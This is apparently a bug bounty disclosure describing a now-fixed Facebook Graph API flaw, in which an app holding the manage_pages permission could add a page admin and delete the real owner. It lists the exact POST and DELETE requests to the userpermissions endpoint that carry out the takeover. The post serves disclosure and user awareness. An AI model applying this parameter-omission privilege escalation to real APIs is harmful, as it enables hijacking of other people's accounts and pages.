Hacking Facebook Pages Vulnerability

A security vulnerability in Facebook business manager endpoint GIVES/ALLOWS a third party app to hack any Facebook page with limited permissions and the victim will HAVE TO permanently lose admin access to the page.

By default Facebook app interface do not allow third party apps to add or modify page admin roles (page roles like manager, editor, analyst etc..). Third party apps are allowed to perform all the operations like post statuses on your behalf, publish photos, etc.. except adding admin roles because if an app is allowed to add or remove admins then it could add some user as admin to the page and remove the actual owner forever.
In the other hand there is an endpoint for business pages called user permissions which allow to add/remove page admin roles who are already handling the Facebook business.

Following request would make target user as admin of the page.

Request :-
POST /<page_id>/userpermissions HTTP/1.1
Host :  graph.facebook.com
Content-Length: 245
role=MANAGER&user=<target_user_id>&business=<associated_business_id>&access_token=<app_access_token>

Response :-
true
After a few minutes of testing i got to know that removing the business parameter from the request didn’t throw any error and allow us to add anyone as new page admin and delete the actual page admin on non business page where the app has manage_pages permission.
That’s it! Whatever the app may be, if it is having manage_pages permission of the admin then it could hack all of your Facebook pages in a fraction of seconds.

Page Takeover :
Request :-
POST /<page_id>/userpermissions HTTP/1.1
Host :  graph.facebook.com
Content-Length: 245
role=MANAGER&user=<target_user_id>&access_token=<app_access_token>

Response :-
true

Removing Victim

Request :-
Delete /<page_id>/userpermissions HTTP/1.1
Host :  graph.facebook.com
Content-Length: 245
user=<target_user_id>&access_token=<app_access_token>

Response :-
true
Thats all! Target page is hacked!

Reported this vulnerability to the Facebook security team and it is completely fixed now. They rewarded me $2500 USD as a part of their bug bounty program.
Even though they placed a fix for this vulnerability, please be aware of the permissions you grant to any apps.

 if manage_pages is requested please note that this app would be able to manage your pages (post statuses, publish photos etc..).
Don’t worry you can still modify the permissions you have granted to other apps here.